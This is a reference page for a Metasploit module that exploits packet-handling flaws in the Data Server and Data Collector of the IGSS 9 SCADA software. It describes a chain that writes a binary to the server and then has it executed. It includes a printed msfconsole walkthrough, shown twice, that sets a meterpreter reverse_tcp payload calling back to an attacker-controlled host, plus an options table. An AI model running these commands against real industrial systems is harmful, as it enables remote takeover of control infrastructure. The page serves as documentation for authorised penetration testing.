7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities
This module exploits multiple vulnerabilities found on IGSS 9's Data Server and Data Collector services. The initial approach is first by transferring our binary with Write packets (opcode 0x0D) via port 12401 (igssdataserver.exe), and then send an EXE packet (opcode 0x0A) to port 12397 (dc.exe), which will cause dc.exe to run that payload with a CreateProcessA() function as a new thread.
Exploit Rank
- Excellent
Exploit Authors
- Luigi Auriemma < >
- sinn3r < sinn3r [at] metasploit.com >
Vulnerability References
- OSVDB-72354
- OSVDB-72349
- http://aluigi.altervista.org/adv/igss_1-adv.txt
- http://aluigi.altervista.org/adv/igss_8-adv.txt
- http://www.us-cert.gov/control_systems/pdf/ICSA-11-132-01A.pdf
Exploit Targets
- 0 - Windows XP
- 1 - Windows 7
- 2 - Windows Server 2003 / R2
Exploit Development
Similar Exploit Modules
- exploit/windows/scada/citect_scada_odbc
- exploit/windows/scada/codesys_web_server
- exploit/windows/scada/daq_factory_bof
- exploit/windows/scada/factorylink_csservice
- exploit/windows/scada/factorylink_vrn_09
- exploit/windows/scada/iconics_genbroker
- exploit/windows/scada/iconics_webhmi_setactivexguid
- exploit/windows/scada/igss9_igssdataserver_listall
- exploit/windows/scada/igss9_igssdataserver_rename
- exploit/windows/scada/moxa_mdmtool
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/scada/igss9_misc
msf exploit(igss9_misc) > show payloads
msf exploit(igss9_misc) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(igss9_misc) > set LHOST [MY IP ADDRESS]
msf exploit(igss9_misc) > set RHOST [TARGET IP]
msf exploit(igss9_misc) > show targets
msf exploit(igss9_misc) > set TARGET [TARGET ID]
msf exploit(igss9_misc) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/scada/igss9_misc
msf exploit(igss9_misc) > show payloads
msf exploit(igss9_misc) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(igss9_misc) > set LHOST [MY IP ADDRESS]
msf exploit(igss9_misc) > set RHOST [TARGET IP]
msf exploit(igss9_misc) > show targets
msf exploit(igss9_misc) > set TARGET [TARGET ID]
msf exploit(igss9_misc) > exploit
Exploit Module Options
| RHOST | The target address |
| RPORT | The target port (default: 0) |
| CHOST | The local client address |
| CPORT | The local client port |
| ConnectTimeout | Maximum number of seconds to establish a TCP connection |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EXE::Custom | Use custom exe instead of automatically generating a payload exe |
| EXE::FallBack | Use the default template in case the specified one is missing |
| EXE::Inject | Set to preserve the original EXE function |
| EXE::OldMethod | Set to use the substitution EXE generation method. |
| EXE::Path | The directory in which to look for the executable template |
| EXE::Template | The executable template file name. |
| EnableContextEncoding | Use transient context when encoding payloads |
| Proxies | Use a proxy chain |
| SSL | Negotiate SSL for outgoing connections |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
| TCP::max_send_size | Maxiumum tcp segment size. (0 = disable) |
| TCP::send_delay | Delays inserted before every send. (0 = disable) |
